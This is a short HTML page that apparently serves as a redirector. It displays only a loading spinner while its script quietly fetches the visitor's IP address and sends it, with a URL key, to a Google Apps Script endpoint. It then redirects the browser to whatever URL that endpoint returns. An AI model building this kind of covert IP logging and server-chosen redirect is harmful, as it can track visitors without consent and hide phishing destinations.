<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title></title>
  <style>
      body {
        background-color: #f1f0e8;
        text-align: center;
      }
      
      .lds-ring {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-ring div {
  box-sizing: border-box;
  display: block;
  position: absolute;
  width: 64px;
  height: 64px;
  margin: 8px;
  border: 8px solid #fff;
  border-radius: 50%;
  animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  border-color: #fff transparent transparent transparent;
}
.lds-ring div:nth-child(1) {
  animation-delay: -0.45s;
}
.lds-ring div:nth-child(2) {
  animation-delay: -0.3s;
}
.lds-ring div:nth-child(3) {
  animation-delay: -0.15s;
}
@keyframes lds-ring {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}

  </style>
</head>
<body>
  <script>
    const AS_URL_BASE = "https://script.google.com/macros/s/AKfycbxe50Lj32aHcC-B_L5aHduD_hsFlMgwe1VmQ_S9eG6enMn5X5aNCAaAMXcVfR5fJWzp/exec";
    
    const urlParams = new URLSearchParams(window.location.search);
    let k = urlParams.get('k'); // Extraemos el valor de k
    
    console.log("Valor de k:", k);
    
    if (k) {
      fetch("https://api.ipify.org?format=json")
        .then(response => response.json())
        .then(data => {
          const userIp = data.ip;
    
          fetch(`${AS_URL_BASE}?k=${k}&ip=${userIp}`)
            .then(r => r.text())
            .then((r) => {
              console.log(r);
              if (r) {
                document.location.replace(r);
              }
            })
            .catch(err => console.log(err));
        })
        .catch(err => console.log("Error obteniendo IP:", err));
    }

  </script>
  
  <div class="lds-ring"><div></div><div></div><div></div><div></div></div>
  
  
</body>
</html>
